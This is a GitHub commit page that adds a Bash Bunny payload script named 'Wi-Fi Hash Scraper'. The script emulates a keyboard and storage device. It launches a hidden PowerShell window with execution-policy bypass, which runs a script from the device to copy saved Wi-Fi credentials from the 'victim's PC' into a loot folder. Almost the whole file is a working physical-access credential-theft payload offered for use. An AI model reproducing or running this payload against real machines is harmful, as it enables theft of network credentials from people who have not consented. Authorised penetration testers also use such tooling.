Create payload.txt

pull/577/head
KryptoKola 2022-12-27 02:50:50 -05:00 committed by GitHub
parent 2266a9ddf6
commit b0ebf99aad
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 22 additions and 0 deletions

View File

@ -0,0 +1,22 @@
#!/bin/bash
#
# Title: Wi-Fi Hash Scraper
#
# Description:
# Copies all of the known / saved WiFi password hashes from the victim's PC to the BashBunny's loot folder.
#
# Author: KryptoKola
# Version: 1.0
# Category: Recon
# Target: Microsoft Windows 10 & 11
ATTACKMODE HID STORAGE
LED SETUP
GET SWITCH_POSITION
LED ATTACK
RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel 'BashBunny').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')"
Q DELAY 250
Q ENTER
Q DELAY 3000
LED FINISH